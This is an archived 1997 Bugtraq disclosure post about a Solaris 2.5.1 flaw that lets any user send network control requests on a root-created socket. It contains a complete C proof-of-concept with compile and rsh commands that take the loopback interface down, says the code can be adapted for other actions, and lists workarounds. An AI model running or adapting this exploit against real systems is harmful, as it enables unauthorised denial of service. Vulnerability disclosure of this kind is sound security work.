Bugtraq mailing list archives

Solaris 2.5.1 party piece


From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100


Well CERT have had this for a year, AUSCERT for a couple of weeks and
now it's time Bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


 solarisuck.c

#include <stdio.h>
#include <string.h>     /* strcpy */
#include <unistd.h>     /* ioctl is declared here on Solaris */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h> /* SIOCSIFFLAGS */
#include <net/if.h>
#include <netinet/in.h>


int main(int argc, char *argv[])
{
        struct ifreq please_break_me;

        /* Descriptor 0 is the socket inherited from rshd/inetd, which
         * root created; the request is aimed at the loopback interface. */
        strcpy( please_break_me.ifr_name, "lo0");
        /* Clearing every flag (including IFF_UP) takes lo0 down. */
        please_break_me.ifr_flags=0;

        if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
        {
                perror("Damn it didnt work. Obviously not Solaris ;)");
                return 1;
        }
        return 0;
}


You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.


Workarounds:
 1.  Disable rsh and any non-root-owned inetd tasks -  breaks remote tar etc.
 2.  Run an OS that the vendor doesn't take a year to fix bugs in

 I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
 to prove Sun have sat on this for ages.

 Alan

